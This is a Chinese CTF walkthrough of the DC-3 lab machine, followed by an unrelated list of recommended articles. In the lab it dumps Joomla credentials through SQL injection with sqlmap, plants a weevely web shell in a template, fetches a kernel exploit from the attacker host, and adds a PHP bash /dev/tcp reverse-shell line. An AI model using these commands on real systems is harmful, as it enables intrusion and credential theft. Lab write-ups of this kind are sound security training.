z_hunter
z_hunter

DC_3 靶机夺旗

兵无常势,水无常形,能因敌而致胜者,谓之神

1. 环境准备

VMware Workstation Pro12
Kali Linux (IP10.10.16.133DC-VM-3 虚拟机
NAT 网络

2. 靶机渗透

2.1 信息收集

2.1.1 主机发现

netdiscover -r 10.10.16.133

DC_3 靶机夺旗_第1张图片

2.1.2 端口扫描

nmap -A -v -sS -sV -p- -T4 10.10.16.139

发现只开放了 80 端口
DC_3 靶机夺旗_第2张图片

2.1.3 目录爆破

nitko -h 10.10.16.139

DC_3 靶机夺旗_第3张图片
进入 administrator 目录,发现是一个后台登录界面
DC_3 靶机夺旗_第4张图片
README.txt 是一个在各种软件行业都会有的阅读指南文件,在这里发现 Joomla 的版本是 3.7.0。
DC_3 靶机夺旗_第5张图片

2.2 漏洞挖掘

在 Joomla 3.7 版本中存在 SQL 注入漏洞

项目: Joomla!
子项目: CMS
严重程度: 高
影响版本: 3.7.0
漏洞类型: SQL注入
CVE号码: CVE-2017-8917
在这里插入图片描述

2.3 漏洞利用

  1. 查看 Poc
cat /usr/share/exploitdb/platforms/php/webapps/42033.txt

DC_3 靶机夺旗_第6张图片

  1. 利用 sqlmap 爆库
sqlmap -u "http://10.10.16.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

DC_3 靶机夺旗_第7张图片

  1. 爆表
sqlmap -u "http://10.10.16.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -D joomladb --tables -p list[fullordering]

DC_3 靶机夺旗_第8张图片

  1. 爆列
sqlmap -u "http://10.10.16.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -D joomladb --tables -T '#__users' --columns -p list[fullordering]

DC_3 靶机夺旗_第9张图片

  1. 爆数据
sqlmap -u "http://10.10.16.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -D joomladb --tables -T '#__users' --columns -C 'name,password' --dump -p list[fullordering]

DC_3 靶机夺旗_第10张图片

  1. 得到的密码是经过 hash 加密的,使用 john 解密
    DC_3 靶机夺旗_第11张图片
  2. 使用帐密:admin/snoopy 登录,发现不能跳转至控制面板。
    DC_3 靶机夺旗_第12张图片
  3. 点击 Extensions – Template – Templates ,选择第一个模板。
    DC_3 靶机夺旗_第13张图片
    DC_3 靶机夺旗_第14张图片
  4. 使用 weevely (Linux 版菜刀)生成后门 zhutou.php
weevely generate 123456 /tmp/zhutou.php

DC_3 靶机夺旗_第15张图片

  1. 在 templates 中新建一个 zhutou.php 文件,将生成的后门代码粘贴进入,保存
    DC_3 靶机夺旗_第16张图片

2.4 Getshell 提权

weevely 连接后门

weevely http://10.10.16.139/templates/beez3/zhutou.php 123456

DC_3 靶机夺旗_第17张图片
通过命令 uname -a 得知当前系统版本
在这里插入图片描述
根据系统版本寻找相应的漏洞利用
DC_3 靶机夺旗_第18张图片
查看 39772.txt

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

DC_3 靶机夺旗_第19张图片
根据链接下载脚本

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip /tmp

DC_3 靶机夺旗_第20张图片
将 tmp 目录作为共享目录,开启 80 服务

python -m SimpleHTTPServer 80

在这里插入图片描述
在靶机的 shell 中下载保存在 Kali 中的攻击脚本。

wget http://10.10.16.133/39772.zip

DC_3 靶机夺旗_第21张图片
然后就是解压文件了

unzip 39772.zip
tar -xvf exploit.tar

DC_3 靶机夺旗_第22张图片
DC_3 靶机夺旗_第23张图片
运行脚本即可提权

./compile.sh
./doubleput

3. 补充

反弹 shell 的另一种做法。

  1. 进入 template/beez3 模板之后,创建 webshell.php 文件,添加进如下代码,保存。

system("bash -c 'bash -i >& /dev/tcp/(Kali IP)/8080 0>&1' ");
?>

DC_3 靶机夺旗_第24张图片

  1. 在 Kali 使用 netcat(瑞士军刀) 监听 8080 端口
nc -lvp 8080
  1. 访问 webshell.php 的位置,在 Kali 中就可以看到反弹 shell 成功
http://10.10.16.139/templates/beez3/webshell.php

DC_3 靶机夺旗_第25张图片

                                                                                                                                 猪头
                                                                                                                              2020.2.20

你可能感兴趣的:(CTF)

  • AI开发tool提示词 开水好喝 测试工具java服务器前端人工智能
    Playwright处理module元素及其子节点[TASK]生成一个isModuleElementObjectfunction,若element的qa-testclass在对象moduleObj{"qa-test-mycourses-course":"qa-test-mycourses-course-title","qa-test-discussion-module":"qa-test-disc
  • 零起步的 FPGA 学习圣经:Project F 开源项目深度解读 OpenFPGA fpga开发学习
    在FPGA学习过程中,你是否也曾遇到过这些问题:教材晦涩难懂,电路图和代码脱节?找不到既系统又实战的开源学习资料?工具链配置复杂,不知从何下手?如果你点头了,那么今天推荐的开源项目ProjectF,可能就是你期待已久的答案。什么是ProjectF?ProjectF是一个完全开源的、面向学习者的FPGA教程项目,由英国开发者WillGreen维护,旨在帮助开发者从零开始学习数字逻辑和硬件设计。项目口
  • BUUCTF[极客大挑战 2019]Knife 我要当web糕手 phpweb
    1.题目分析1.启动靶机,查看网页中间一句话木马,帮助我们获得webshell,以POST形式接受变量SycPHP一句话木马通常是一个非常短小的PHP代码片段,通过一行代码实现对受攻击系统的控制。这种木马通常以加密或编码的形式出现,以避免被检测到。一句话木马的特点是使用简洁的语法和功能强大的命令执行功能,可以通过与恶意控制端进行通信,执行各种操作,例如上传/下载文件、执行系统命令、创建用户、修改文
  • 【QT】QPointF、QRectF、QPolygonF 介绍 我不是程序猿儿 QT之路qt开发语言
    QPointF确实存在于Qt框架中,它是一个类,用于表示二维空间中的一个点,其中包含了浮点精度的x和y坐标。主要特点和用途高精度坐标:QPointF使用double类型来存储x和y坐标,这提供了比QPoint(后者存储整数坐标)更高的精度。这在需要精确定位或处理图形和界面元素时特别有用,例如在绘图、图像处理或任何需要几何计算的应用中。数学运算支持:QPointF提供了一系列便利的数学运算,如加法、
  • 【防攻世界】misc解题思路-学习笔记 CarrotNot MIsc解题练习学习安全
    前言靶场地址:防攻世界一、Catfalg丢进kali或者其他Linux系统直接catflag二、MeowMeow可爱的小猫这道题就很离谱,flag需要用010工具打开,拉到最后就可以看到文字样式组起来就是:CatCTF{CAT_GOES_MEOW}
  • 2021-09-28 网安实验-杂项-SCTF-Misc400A 愚公搬代码 愚公系列-网络安全实验测试工具windows
    相关知识WireSharkWireshark是一个网络数据包分析软件,即通常所说的抓包软件。Wireshark可以抓取通过制定网卡的所有网络数据包,并根据数据包的格式尽可能显示出最为详细的信息,其支持各种主流的网络通信协议。Wireshark使用WinPCAP作为接口,直接与网卡进行数据交换。Wireshark提供了显示过滤控制,使用tcpcontains".rar"过滤器可以过滤含有.rar字符
  • WinUI3入门9:自制SplitPanel 初级代码游戏 WinUIWinUIC#SplitPanel拉伸
    初级代码游戏的专栏介绍与文章目录-CSDN博客我的github:codetoys,所有代码都将会位于ctfc库中。已经放入库中我会指出在库中的位置。这些代码大部分以Linux为目标但部分代码是纯C++的,可以在任何平台上使用。源码指引:github源码指引_初级代码游戏的博客-CSDN博客C#是我多年以来的业余爱好,新搞的东西能用C#的就用C#了。WinUI3里面有个SplitView,实现了两块
  • 【Linux】文件描述符和重定向 好像有点东西 Linuxlinux
    目录一、回顾C文件二、系统文件I/O2.1系统调用open2.2标志位传参2.3系统调用write2.4文件描述符fd2.5structfile2.6fd的分配规则2.7重定向2.7.1基本原理:2.7.2系统调用dup22.8标准错误一、回顾C文件文件=内容+属性对文件的操作:a.对内容操作b.对属性操作内容是数据,属性其实也是数据——存储文件,必须既存储内容,又存储属性数据——默认文件是在磁盘
  • contactform7 ajax,Contact Form 7插件高级应用
    原标题:ContactForm7插件高级应用WordPress联系表单插件–ContactForm7是一款简单易用扩展性灵活的表单插件,可以自定义各式各样不同类型的表单功能,而且支持自定义接受邮件,Ajax提交和jQuery表单插件支持。可结合Akismet过滤垃圾邮件,同时也支持CAPTCHA反垃圾邮件,表单域元素支持各种最常见的:单选框、复选框、文本框、下拉菜单、按钮、文件上传等多种表单域。C
  • contactform7 ajax,Contact Form 7 最强大的wordpress表单插件 Dennis Feng contactform7ajax
    10年前(2011-09-02)|54,093views|54条评论|本文共2961个字朗读这篇文章不得不介绍一下这款插件ContactForm7,真的是很强大,在还没用上ContactForm7之前,居然先被推荐使用cforms,结果白白花了2,3个小时研究这个复杂的东东,而使用Contactform7的话,2分钟就搞定了,而且功能比cforms强大,最重要的是更简单!同样是一款表单制作插件,我
  • Contact Form 7表单获取提交用户IP及URL等信息 xgtu.cn Contactform7
    有时候,您可能需要了解ContactForm7表单提交后的更多的信息,而不仅仅是通过联系人表单字段获取用户的联系信息。例如,需要知道用户是哪个国家(通过获取IP),了解用户使用的设备(手机还是电脑,什么浏览器),通过哪个页面提交的询盘表单等。通过以下特殊的邮件标签即可实现,可能非常有用。与其他邮件标签不同,特殊邮件标签独立于表单字段或子字段的输入。您可以将这些特殊的邮件标记放置在允许使用邮件标记的
  • wordpress外贸独立站常用留言表单插件 contact form 7 wodrpress资源分享 wordpresswordpress
    ContactForm7介绍ContactForm7是一款非常流行的WordPress联系表单插件,广泛应用于外贸独立站。以下是其主要特点:功能强大且免费:ContactForm7是完全免费的,支持创建和管理多个联系表单。简单易用:用户无需编写代码,通过简单的拖放和配置即可设置表单字段、邮件通知等功能。高度自定义:支持自定义表单域,包括文本框、单选框、复选框、下拉菜单、文件上传等多种表单元素。扩展
  • linux shell做界面,linux shell图形界面dialog详解 weixin_39747049 linuxshell做界面
    dialogwidgets的选项,及使用方法calendar显示日历checklist...复选框form表单editboxdselectfselect文件选框,即平时上传本地文件时的那个gauge[]进度条,百分之多少的那个infobox弹出一个文本信息,不需要等待回应inputbox[]文本框inputmenumenumsgbox弹出一个文本信息,需要用户选择,并点击okpause暂停页pas
  • AntDesignPro权限按钮实战指南 bemyrunningdog antdesignproreacttypescript前端
    AntDesignPro权限按钮系统(TypeScript实现)AntDesignPro提供了完整的权限管理解决方案。下面是基于TypeScript的权限按钮实现方案,结合了@umijs/plugin-access插件和自定义组件。完整实现方案importReactfrom'react';import{useModel,useAccess,Access}from'umi';import{Butto
  • C++11 完美转发(Perfect Forwarding) 程序员乐逍遥 C++高手修炼营C/C++网络编程专题C/C++多线程编程专题c++开发语言froward
    在现代C++中,完美转发(PerfectForwarding)是一个非常重要但又略显神秘的概念。它允许我们在模板函数中将参数“原封不动”地传递给另一个函数,保持其原始的值类别(左值/右值)、const属性等信息不变。完美转发是实现通用库函数、工厂模式、泛型封装器(如std::function、lambda表达式)以及智能指针构造函数的关键技术之一。一、什么是完美转发?✅定义完美转发是指:在函数模板
  • C#设计模式之AbstractFactory_抽象工厂_对象创建新模式-练习制作PANL(一) 99乘法口诀万物皆可变 C#服务器javascripthtmlc#
    系统功能说明核心功能控件列表(ListView)展示可用控件类型(按钮、文本框、标签等)支持拖拽操作创建新控件设计面板(Panel)可视化设计区域支持拖拽添加控件支持移动已添加的控件网格背景辅助布局参数树(TreeView)实时显示设计面板上的控件展示控件属性和事件信息随控件移动自动更新位置信息持久化功能保存设计到文件(XML序列化)从文件加载设计(反序列化)初稿完成界面,后续添加各种事件,其实个
  • 前言(做个提示大纲) 阿捏利 加解密与C哈希算法算法c语言
    写了好多CTF的Reverse,突然冒出个想法,想写一个《加解密与C》的合集,总体思路就是用C去实现目前常见的加解密算法,包含国密。这篇文章主要是为了记录一个大纲。大致会分成如下系列来写,不一定全,后期会根据情况去补base系列base24、base32、base36、base64、base16、base85(a)、base85(b)、base58、base91、base92、base62、bas
  • ssrf漏洞利用+CTF实例 疯狂的小羊肖恩 网络信息安全基础知识CTF-wpredis数据库缓存
    引发ssrf漏洞的几个函数file_get_contents()把整个文件读入一个字符串中,获取本地或者远程文件内容fsockopen()获得套接字信息curl_exec()执行一个curl会话,由curl_init()初始化一个新的会话,返回一个curl句柄fopen()打开文件或者URLreadfile()输出一个文件,读入一个文件并写入到输出缓冲ssrf用到的协议file协议:获取敏感文件信
  • 常见哈希格式类型及其在CTF与渗透测试中的爆破与伪造策略(PBKDF2、bcrypt...) vortex5 哈希算法算法
    一、引言在CTF比赛或渗透测试中,获取并利用目标系统的密码哈希是常见的场景。例如,通过Web应用漏洞提取数据库中的用户密码哈希,或通过提权漏洞获取/etc/shadow文件中的系统用户哈希。这些哈希通常采用不同加密算法,如MD5、SHA-256、bcrypt、PBKDF2、scrypt、yescrypt或Argon2。每种算法在安全性、计算复杂度和抗破解能力上有着显著差异,直接影响到爆破难度和伪造
  • [HarmonyOS 5] 端侧模型推理精度测试:如何可以量化NPU加速后的浮点误差? 程序员小刘 深度学习pytorch人工智能HarmonyOS5
    以下是针对HarmonyOS5端侧模型在NPU加速场景下的浮点误差量化测试方案,综合精度控制策略、误差测量方法及工具链验证流程:一、精度控制核心策略‌‌编译级浮点约束‌启用严格浮点模式,禁用编译器激进优化://build-profile.json5{"compileOptions":{"strictFloatPoint":true,//禁止指令重排与并行优化"fastMath":false//关闭
  • NT缓存管理器(三) less@more cachingobjectbufferintegerpointerscache
    CcCanIWrite因为应用程序能够在内存中以大于写回磁盘的速度修改数据,虚拟内存系统能用数据填满。这反过来在VM系统中能够导致致命的out-of-memory情况。缓存管理器提供的一个支持这个的关键操作是CcCanIWrite.这种回调的原型是:NTKERNELAPIBOOLEANCcCanIWrite(INPFILE_OBJECTFileObject,INULONGBytesToWrite,
  • Linux目录结构深度解析与CTF实战指南:从基础到高级渗透技巧 Bruce_xiaowei 总结经验笔记linux运维服务器CTF网络安全
    Linux目录结构深度解析与CTF实战指南:从基础到高级渗透技巧引言:揭开Linux文件系统的神秘面纱不同于Windows的多盘符系统(C:、D:等),Linux采用单一根目录的树状结构,所有内容都从根目录(/)开始延伸。这种设计不仅使系统更加简洁高效,也为安全研究和CTF比赛提供了独特的挑战和机会。在本文中,我们将全面剖析Linux目录结构,不仅介绍每个核心目录的功能,更重要的是揭示它们在CTF
  • C++中的完美转发与类型特性:`std::forward`与`std::remove_reference`详解 郝学胜@无限畅想大公司 C++c++开发语言
    在现代C++的泛型编程中,**完美转发(PerfectForwarding)**和**类型特性(TypeTraits)**是两个至关重要的概念。它们不仅提升了代码的灵活性和效率,还为资源管理、模板元编程等场景提供了强大的支持。本文将深入解析`std::forward`和`std::remove_reference`的实现原理与实际应用,帮助开发者更好地掌握C++的底层机制。一、`std::forw
  • LangGraph--设计一个给出标准提示词模板的聊天机器人 zsffuture 机器人windowspython
    创建一个聊天机器人,帮助用户生成提示。它将首先收集用户的需求,然后生成提示(并根据用户输入进行优化)。这些功能被分为两个独立的状态,而LLM决定何时在这两个状态之间切换。测试结果如下:fromtypingimportAnnotated,List,Literalfromtyping_extensionsimportTypedDictfromlangchain_deepseekimportChatDe
  • 设计模式精讲 Day 3:抽象工厂模式(Abstract Factory Pattern) 在未来等你 23种设计模式精讲design-patternsjavasoftware-design
    【设计模式精讲Day3】抽象工厂模式(AbstractFactoryPattern)文章简述在软件开发中,随着业务复杂度的提升,系统需要支持多种产品族的创建。抽象工厂模式正是为了解决这一问题而诞生的设计模式之一。本文作为“设计模式精讲”系列的第3天,深入讲解抽象工厂模式的核心思想、实现方式与实际应用场景。文章从模式定义出发,通过UML类图和Java代码示例详细解析其结构与工作原理,并结合真实项目案
  • CTF题型解题思路总结 Bruce_xiaowei 总结经验笔记网络安全CTF
    CTF题型解题思路总结1.逆向工程(ReverseEngineering)目标理解程序逻辑,绕过保护(如注册码验证)、提取隐藏信息或还原加密算法。解题步骤信息收集获取目标程序(可执行文件、脚本等)查看程序类型(WindowsPE、LinuxELF、AndroidAPK等)检查文件基本信息(file、strings、objdump)静态分析使用IDAPro、Ghidra、Radare2逆向反汇编和反
  • 深入解析XXE漏洞利用:Base64编码的PHP过滤器+回调回传攻击 Bruce_xiaowei 笔记总结经验php开发语言网络安全CTFXXE
    深入解析XXE漏洞利用:Base64编码的PHP过滤器+回调回传攻击在网络安全和CTF实战中,XXE(XMLExternalEntity)漏洞因其独特的攻击方式和广泛的应用环境,成为Web安全学习的重要一环。今天,我们以一个高级且实用的XXE利用Payload为例,详细拆解其构造和原理,帮助你快速理解XXE远程文件读取的攻防关键。一、什么是XXE漏洞?XXE(XML外部实体注入)是指在XML解析过
  • spring如何处理bean的循环依赖 明月惊雀 spring相关springjava后端
    假设在spring中beanA依赖beanB,beanB依赖beanA,这种循环依赖的情况通常会使用三级缓存的方式进行处理。什么是三级缓存一级缓存:存储的是已经实例化完成的bean实例。二级缓存:存放在这里的是提前暴露的bean半成品。若Bean需AOP代理(如@Async、@Transactional),三级缓存的ObjectFactory会提前生成代理对象并存入二级缓存,避免重复创建代理。三级
  • React Native【实战范例】网格导航 FlatList 朝阳39 ReactNativereactnative
    importReactfrom"react";import{FlatList,Image,SafeAreaView,StyleSheet,Text,View,}from"react-native";interfaceGridItem{id:string;title:string;imageUrl:string;}//网格布局数据constgridData=Array.from({length:30
  • Java设计模式概览 nlog3n 设计模式java设计模式开发语言
    Java设计模式Java设计模式详解一、设计模式概述1.为什么需要设计模式2.设计模式分类二、创建型模式(5种)1.单例模式(Singleton)2.工厂方法模式(FactoryMethod)3.抽象工厂模式(AbstractFactory)4.建造者模式(Builder)5.原型模式(Prototype)三、结构型模式(7种)1.适配器模式(Adapter)2.桥接模式(Bridge)3.组合模
  • ViewController添加button按钮解析。(翻译) 张亚雄 c
    <div class="it610-blog-content-contain" style="font-size: 14px"></div>//  ViewController.m //  Reservation software // //  Created by 张亚雄 on 15/6/2.
  • mongoDB 简单的增删改查 开窍的石头 mongodb
       在上一篇文章中我们已经讲了mongodb怎么安装和数据库/表的创建。在这里我们讲mongoDB的数据库操作       在mongo中对于不存在的表当你用db.表名 他会自动统计 下边用到的user是表明,db代表的是数据库       添加(insert):
  • log4j配置 0624chenhong log4j
    1) 新建java项目 2) 导入jar包,项目右击,properties—java build path—libraries—Add External jar,加入log4j.jar包。 3) 新建一个类com.hand.Log4jTest package com.hand; import org.apache.log4j.Logger; public class
  • 多点触摸(图片缩放为例) 不懂事的小屁孩 多点触摸
    多点触摸的事件跟单点是大同小异的,上个图片缩放的代码,供大家参考一下 import android.app.Activity; import android.os.Bundle; import android.view.MotionEvent; import android.view.View; import android.view.View.OnTouchListener
  • 有关浏览器窗口宽度高度几个值的解析 换个号韩国红果果 JavaScripthtml
    1 元素的 offsetWidth 包括border padding  content  整体的宽度。 clientWidth  只包括内容区 padding 不包括border。 clientLeft =  offsetWidth -clientWidth  即这个元素border的值 offsetLeft  若无已定位的包裹元素
  • 数据库产品巡礼:IBM DB2概览 蓝儿唯美 db2
    IBM DB2是一个支持了NoSQL功能的关系数据库管理系统,其包含了对XML,图像存储和Java脚本对象表示(JSON)的支持。DB2可被各种类型的企 业使用,它提供了一个数据平台,同时支持事务和分析操作,通过提供持续的数据流来保持事务工作流和分析操作的高效性。 DB2支持的操作系统 DB2可应用于以下三个主要的平台:   工作站,DB2可在Linus、Unix、Windo
  • java笔记5 a-john java
    控制执行流程: 1,true和false    利用条件表达式的真或假来决定执行路径。例:(a==b)。它利用条件操作符“==”来判断a值是否等于b值,返回true或false。java不允许我们将一个数字作为布尔值使用,虽然这在C和C++里是允许的。如果想在布尔测试中使用一个非布尔值,那么首先必须用一个条件表达式将其转化成布尔值,例如if(a!=0)。 2,if-els
  • Web开发常用手册汇总 aijuans PHP
    一门技术,如果没有好的参考手册指导,很难普及大众。这其实就是为什么很多技术,非常好,却得不到普遍运用的原因。 正如我们学习一门技术,过程大概是这个样子: ①我们日常工作中,遇到了问题,困难。寻找解决方案,即寻找新的技术; ②为什么要学习这门技术?这门技术是不是很好的解决了我们遇到的难题,困惑。这个问题,非常重要,我们不是为了学习技术而学习技术,而是为了更好的处理我们遇到的问题,才需要学习新的
  • 今天帮助人解决的一个sql问题 asialee sql
                今天有个人问了一个问题,如下: type     AD      value          A  
  • 意图对象传递数据 百合不是茶 android意图IntentBundle对象数据的传递
    学习意图将数据传递给目标活动; 初学者需要好好研究的       1,将下面的代码添加到main.xml中    <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:android="http:/
  • oracle查询锁表解锁语句 bijian1013 oracleobjectsessionkill
    一.查询锁定的表 如下语句,都可以查询锁定的表 语句一: select a.sid, a.serial#, p.spid, c.object_name, b.session_id, b.oracle_username, b.os_user_name from v$process p, v$s
  • mac osx 10.10 下安装 mysql 5.6 二进制文件[tar.gz] 征客丶 mysqlosx
    场景:在 mac osx 10.10 下安装 mysql 5.6 的二进制文件。 环境:mac osx 10.10、mysql 5.6 的二进制文件 步骤:[所有目录请从根“/”目录开始取,以免层级弄错导致找不到目录] 1、下载 mysql 5.6 的二进制文件,下载目录下面称之为 mysql5.6SourceDir; 下载地址:http://dev.mysql.com/downl
  • 分布式系统与框架 bit1129 分布式
    RPC框架 Dubbo 什么是Dubbo   Dubbo是一个分布式服务框架,致力于提供高性能和透明化的RPC远程服务调用方案,以及SOA服务治理方案。其核心部分包含:    远程通讯: 提供对多种基于长连接的NIO框架抽象封装,包括多种线程模型,序列化,以及“请求-响应”模式的信息交换方式。    集群容错: 提供基于接
  • 那些令人蛋痛的专业术语 白糖_ springWebSSOIOC
    spring 【控制反转(IOC)/依赖注入(DI)】: 由容器控制程序之间的关系,而非传统实现中,由程序代码直接操控。这也就是所谓“控制反转”的概念所在:控制权由应用代码中转到了外部容器,控制权的转移,是所谓反转。 简单的说:对象的创建又容器(比如spring容器)来执行,程序里不直接new对象。 Web 【单点登录(SSO)】:SSO的定义是在多个应用系统中,用户
  • 《给大忙人看的java8》摘抄 braveCS java8
    函数式接口:只包含一个抽象方法的接口 lambda表达式:是一段可以传递的代码       你最好将一个lambda表达式想象成一个函数,而不是一个对象,并记住它可以被转换为一个函数式接口。 事实上,函数式接口的转换是你在Java中使用lambda表达式能做的唯一一件事。   方法引用:又是要传递给其他代码的操作已经有实现的方法了,这时可以使
  • 编程之美-计算字符串的相似度 bylijinnan java算法编程之美
    public class StringDistance { /** * 编程之美 计算字符串的相似度 * 我们定义一套操作方法来把两个不相同的字符串变得相同,具体的操作方法为: * 1.修改一个字符(如把“a”替换为“b”); * 2.增加一个字符(如把“abdd”变为“aebdd”); * 3.删除一个字符(如把“travelling”变为“trav
  • 上传、下载压缩图片 chengxuyuancsdn 下载
    /** * * @param uploadImage --本地路径(tomacat路径) * @param serverDir --服务器路径 * @param imageType --文件或图片类型 * 此方法可以上传文件或图片.txt,.jpg,.gif等 */ public void upload(String uploadImage,Str
  • bellman-ford(贝尔曼-福特)算法 comsci 算法F#
    Bellman-Ford算法(根据发明者 Richard Bellman 和 Lester Ford 命名)是求解单源最短路径问题的一种算法。单源点的最短路径问题是指:给定一个加权有向图G和源点s,对于图G中的任意一点v,求从s到v的最短路径。有时候这种算法也被称为 Moore-Bellman-Ford 算法,因为 Edward F. Moore zu 也为这个算法的发展做出了贡献。 与迪科
  • oracle ASM中ASM_POWER_LIMIT参数 daizj ASMoracleASM_POWER_LIMIT磁盘平衡
    ASM_POWER_LIMIT 该初始化参数用于指定ASM例程平衡磁盘所用的最大权值,其数值范围为0~11,默认值为1。该初始化参数是动态参数,可以使用ALTER  SESSION或ALTER  SYSTEM命令进行修改。示例如下: SQL>ALTER  SESSION  SET   Asm_power_limit=2;
  • 高级排序:快速排序 dieslrae 快速排序
    public void quickSort(int[] array){ this.quickSort(array, 0, array.length - 1); } public void quickSort(int[] array,int left,int right){ if(right - left <= 0
  • C语言学习六指针_何谓变量的地址 一个指针变量到底占几个字节 dcj3sjt126com C语言
    # include <stdio.h> int main(void) { /* 1、一个变量的地址只用第一个字节表示 2、虽然他只使用了第一个字节表示,但是他本身指针变量类型就可以确定出他指向的指针变量占几个字节了 3、他都只存了第一个字节地址,为什么只需要存一个字节的地址,却占了4个字节,虽然只有一个字节, 但是这些字节比较多,所以编号就比较大,
  • phpize使用方法 dcj3sjt126com PHP
    phpize是用来扩展php扩展模块的,通过phpize可以建立php的外挂模块,下面介绍一个它的使用方法,需要的朋友可以参考下 安装(fastcgi模式)的时候,常常有这样一句命令: 代码如下: /usr/local/webserver/php/bin/phpize   一、phpize是干嘛的? phpize是什么? phpize是用来扩展php扩展模块的,通过phpi
  • Java虚拟机学习 - 对象引用强度 shuizhaosi888 JAVA虚拟机
    本文原文链接:http://blog.csdn.net/java2000_wl/article/details/8090276 转载请注明出处! 无论是通过计数算法判断对象的引用数量,还是通过根搜索算法判断对象引用链是否可达,判定对象是否存活都与“引用”相关。 引用主要分为 :强引用(Strong Reference)、软引用(Soft Reference)、弱引用(Wea
  • .NET Framework 3.5 Service Pack 1(完整软件包)下载地址 happyqing .net下载framework
      Microsoft .NET Framework 3.5 Service Pack 1(完整软件包)  http://www.microsoft.com/zh-cn/download/details.aspx?id=25150 Microsoft .NET Framework 3.5 Service Pack 1 是一个累积更新,包含很多基于 .NET Framewo
  • JAVA定时器的使用 jingjing0907 javatimer线程定时器
    1、在应用开发中,经常需要一些周期性的操作,比如每5分钟执行某一操作等。 对于这样的操作最方便、高效的实现方式就是使用java.util.Timer工具类。 privatejava.util.Timer timer; timer = newTimer(true); timer.schedule( newjava.util.TimerTask() { public void run()
  • Webbench 流浪鱼 webbench
    首页下载地址 http://home.tiscali.cz/~cz210552/webbench.html Webbench是知名的网站压力测试工具,它是由Lionbridge公司(http://www.lionbridge.com)开发。 Webbench能测试处在相同硬件上,不同服务的性能以及不同硬件上同一个服务的运行状况。webbench的标准测试可以向我们展示服务器的两项内容:每秒钟相
  • 第11章 动画效果(中) onestopweb 动画
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • windows下制作bat启动脚本. sanyecao2314 javacmd脚本bat
    java -classpath C:\dwjj\commons-dbcp.jar;C:\dwjj\commons-pool.jar;C:\dwjj\log4j-1.2.16.jar;C:\dwjj\poi-3.9-20121203.jar;C:\dwjj\sqljdbc4.jar;C:\dwjj\voucherimp.jar com.citsamex.core.startup.MainStart
  • Java进行RSA加解密的例子 tomcat_oracle java
    加密是保证数据安全的手段之一。加密是将纯文本数据转换为难以理解的密文;解密是将密文转换回纯文本。   数据的加解密属于密码学的范畴。通常,加密和解密都需要使用一些秘密信息,这些秘密信息叫做密钥,将纯文本转为密文或者转回的时候都要用到这些密钥。   对称加密指的是发送者和接收者共用同一个密钥的加解密方法。   非对称加密(又称公钥加密)指的是需要一个私有密钥一个公开密钥,两个不同的密钥的
  • Android_ViewStub 阿尔萨斯 ViewStub
    public final class ViewStub extends View java.lang.Object android.view.View android.view.ViewStub 类摘要: ViewStub 是一个隐藏的,不占用内存空间的视图对象,它可以在运行时延迟加载布局资源文件。当 ViewSt
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他